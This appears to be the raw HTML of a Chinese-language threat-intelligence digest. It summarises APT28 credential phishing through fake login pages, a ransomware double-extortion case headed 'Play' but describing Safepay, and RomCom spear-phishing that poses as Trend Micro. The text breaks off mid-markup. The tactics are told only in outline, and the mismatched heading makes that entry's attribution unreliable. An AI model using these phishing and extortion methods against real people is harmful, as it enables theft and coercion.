src="https://wechat2rss.xlab.app/img-proxy/?k=343f759b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FlEA1fhJ8dPY8CTT6cndXkb6ur6jwOSHJZrUN8G5PHYmGgEsFZFiaAS4vMZEBibcYNe26PC6afBZcvSWSDxLCzJ9A%2F640%3Ffrom%3Dappmsg%26wx_fmt%3Dpng"/></p></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="md8hmvkqws0"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="margin-bottom: 9px;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><p style="margin: 0 5px 0 9px;" data-mid="" mpa-from-tpl="t"><h1 style="font-size: 26px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 31px;letter-spacing: 4px;-webkit-text-stroke: 2px #222CFF;" data-mid=""><span leaf="">01</span></h1></p></div><div data-mid="" mpa-from-tpl="t"><div data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 22px;letter-spacing: 1px;" data-mid=""><span leaf="" mpa-font-style="md8in1abcbk" style="font-size: 20px;" data-mpa-action-id="md8in1bg1b37" data-pm-slice="0 0 []">家族团伙事件</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8lv9e2vk7"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 5 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8lv9e2vk7&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex; justify-content: center; align-items: center; width: 100%;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8marrbmy6" style="font-size: 32px;" data-mpa-action-id="md8mars91cih" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">01</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">APT28借伪造登录页实施长期钓鱼攻击，窃取用户敏感数据及情报收集</span></span></p></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;list&#34;,{&#34;type&#34;:&#34;ul&#34;,&#34;style&#34;:&#34;list-style-type: circle;&#34;,&#34;class&#34;:&#34;list-paddingleft-1&#34;,&#34;start&#34;:null},&#34;listitem&#34;,{&#34;style&#34;:&#34;font-size:14px;&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-weight: bold;">家族团伙别名：</span></span></p></div><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;text-align: left;"><span leaf="">Black Energy, BROMINE, 奇幻熊, BlackEnergy, Crouching Yeti, Havex, Koala Team, Group 24, Berserker Bear, Ghost Blizzard, CrouchingYeti, DYMALLOY, DragonFly, Dragonfly2, Sednit, Pawn Storm, TAG_0700, Sofacy, Swallowtail, GRIZZLY STEPPE, Fancy Bear, Threat Group-4127, APT-C-20, STRONTIUM, Tsar Team, TG-4127, Group 74, SNAKEMACKEREL, downex, T-APT-12, Iron Twilight, CASTLE, ALLANITE, BERSERK BEAR, TG-4192, IRON LIBERTY, ATK6, G0035, ITG15, Blue Kraken, Energetic-Bear group</span></span></p></div></li><li style="font-size:14px;"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p style="text-align: left;"><span style="font-weight: bold;text-align: justify;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;background-color: transparent;"><span leaf="">家族团伙主要影响行业：</span></span></p></div><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;text-align: justify;"><span leaf="">建筑与不动产, 互联网技术服务, 政法, 能源, 教育, 交通</span></span></p></div></li><li><p><span mpa-font-style="md8j92uo17j9" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://thehackernews.com/2025/12/apt28-targets-ukrainian-ukr-net-users.html" target="_blank">https://thehackernews.com/2025/12/apt28-targets-ukrainian-ukr-net-users.html</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;" data-mpa-action-id="md8j92vi11y1"><span leaf=""><span textstyle="" style="font-size: 14px;">长期活跃的 APT28 组织延续网络钓鱼与凭证窃取作战模式，2024 年 6 月至 2025 年 4 月开展相关攻击活动。攻击者在合法托管平台部署伪造登录页面，将链接嵌入钓鱼邮件的 PDF 文档中，部分通过短链接服务或子域名构建两级重定向链，引导受害者进入假冒凭证收集页面。与以往不同，此次采用代理隧道服务，体现出攻击策略的适应性调整。整个攻击流程设计严密，展现出较高技术实力与周密规划，旨在窃取用户凭证及相关认证代码，以实现情报收集目的，可能导致大量敏感信息泄露，对相关网络安全构成持续威胁。</span></span></p><p style="text-align: center;" nodeleaf=""><img data-imgfileid="100027344" class="rich_pages wxw-img" data-ratio="0.20041536863966772" data-s="300,640" data-type="png" data-w="963" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=c337385b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6AoQM3RKCWVOLN3ibuhuNxneajvOriaicN1f79kU0JqpolTLbK5ianAGYaz0LbKFKdMnzKOTHib8L4aZBGp4RYFGj4A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="8 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8lv9e2vk7"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 5 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8lv9e2vk7&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex; justify-content: center; align-items: center; width: 100%;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8marrbmy6" style="font-size: 32px;" data-mpa-action-id="md8mars91cih" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">02</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">Play惯施双重勒索手段，索要赎金并威胁泄露或售卖所窃数据</span></span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><p style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p style="text-align: left;"><span leaf="" style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;"><span textstyle="" style="letter-spacing: 0.034em;background-color: transparent;font-weight: bold;">家族团伙</span><span textstyle="" style="font-weight: bold;">主要影响行业：</span></span></p></div><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;text-align: justify;"><span leaf="">互联网技术服务, 教育, 农林牧渔, 汽车, 金融, 建筑与不动产</span></span></p></div></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8j92uo17j9" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.hendryadrian.com/safepay-ransomware-group-breaches-us-engineering-firm-chemstress/" target="_blank">https://www.hendryadrian.com/safepay-ransomware-group-breaches-us-engineering-firm-chemstress/</a></span></span></p></li></ul></p></div></div><p style="text-indent: 2em;margin-top: 24px;text-align: left;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 14px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mef52r511pda" data-mpa-action-id="mef52r5b7jz" data-pm-slice="0 0 []">Safepay 勒索软件组织对一家工程与施工企业发起网络攻击，采用双重勒索策略：先通过疑似系统漏洞或弱口令渗透企业网络，窃取涉及相关项目的敏感数据，再加密关键文件干扰正常业务。随后，该组织将部分窃取数据公布于勒索门户，设定截止期限并威胁逾期公开全部数据，迫使企业支付赎金。此次攻击暴露了目标企业信息安全防护漏洞，也反映出相关行业网络安全挑战的升级态势。攻击可能导致企业面临重大经济损失、声誉受损、业务中断，敏感数据外泄还可能引发法律合规问题及后续安全隐患，对项目管理和客户信任造成持续影响。</span></p></div></div></div></div></div></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j9i4u1nvn"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="8 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px;padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%;padding-left: 0px;padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8lv9e2vk7"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 5 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8lv9e2vk7&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex; justify-content: center; align-items: center; width: 100%;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8majiw20v4" style="font-size: 32px;" data-mpa-action-id="md8majjwecx" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">03</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-w="162" class="rich_pages wxw-img" data-ratio="0.04938271604938271" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">RomCom伪装趋势科技发布虚假公告，针对关键基础设施发起多阶段鱼叉式钓鱼攻击</span></span></p></div></div></div></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li style="font-size:14px;"><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-weight: bold;">家族团伙别名：</span></span></p><p><span leaf="">Storm-0978，Tropical Scorpius，UNC2596; Void Rabisu，UAC-0180;UAT-5647，Void Rabisu，UAC-0180，UNC2596，UAT-5647</span></p></li><li style="font-size:14px;"><p style="text-align: left;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">家族团伙主要影响行业：</span></span></p><p style="text-align: left;"><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, 